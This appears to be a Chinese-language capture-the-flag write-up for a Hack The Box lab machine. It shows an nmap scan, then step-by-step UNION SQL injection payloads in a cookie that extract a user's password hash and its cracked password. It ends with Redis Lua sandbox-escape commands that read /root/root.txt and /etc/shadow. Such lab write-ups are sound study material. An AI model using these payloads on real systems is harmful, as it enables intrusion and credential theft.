$ nmap -sC -sV -Pn 10.10.11.172 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-04 13:19 CST Nmap scan report for 10.10.11.172 Host is up (0.34s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 91:e8:35:f4:69:5f:c2:e2:0e:27:46:e2:a6:b6:d8:65 (RSA) | 256 cf:fc:c4:5d:84:fb:58:0b:be:2d:ad:35:40:9d:c3:51 (ECDSA) |_ 256 a3:38:6d:75:09:64:ed:70:cf:17:49:9a:dc:12:6d:11 (ED25519) 80/tcp open http nginx 1.18.0 |_http-title: Did not follow redirect to http://shared.htb |_http-server-header: nginx/1.18.0 443/tcp open ssl/http nginx 1.18.0 |_http-title: 400 The plain HTTP request was sent to HTTPS port | ssl-cert: Subject: commonName=*.shared.htb/organizationName=HTB/stateOrProvinceName=None/countryName=US | Not valid before: 2022-03-20T13:37:14 |_Not valid after: 2042-03-15T13:37:14 | tls-nextprotoneg: | h2 |_ http/1.1 | tls-alpn: | h2 |_ http/1.1 |_ssl-date: TLS randomness does not represent time |_http-server-header: nginx/1.18.0 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 133.58 seconds
shared.htb
需要加hosts:
1
10.10.11.172 shared.htb
一个商城,测试添加后结算会到另一个子域名:
checkout.shared.htb
同样加hosts后继续流程:
1
10.10.11.172 shared.htb checkout.shared.htb
注意到商品信息存储在cookie中:
sql注入
尝试修改cookie,刷新,基础的sql注入:
1
{"' and 0=1 union select 1,2,3-- -":"1"}
后续就是一步步获取信息
1 2 3 4 5 6 7 8 9 10 11 12 13
{"' and 0=1 union select 1,database(),3-- -":"1"} checkout
{"' and 0=1 union select 1,table_name,table_schema from information_schema.tables where table_schema='checkout'-- -":"1"} user
{"' and 0=1 union select 1,username,2 from checkout.user-- -":"1"} james_mason
{"' and 0=1 union select 1,password,2 from checkout.user-- -":"1"} fc895d4eddc2fc12f995e18c865cf273 # 破解出密码 Soleil101
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /root/root.txt", "r"); local res = f:read("*a"); f:close(); return res' 0
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /etc/shadow", "r"); local res = f:read("*a"); f:close(); return res' 0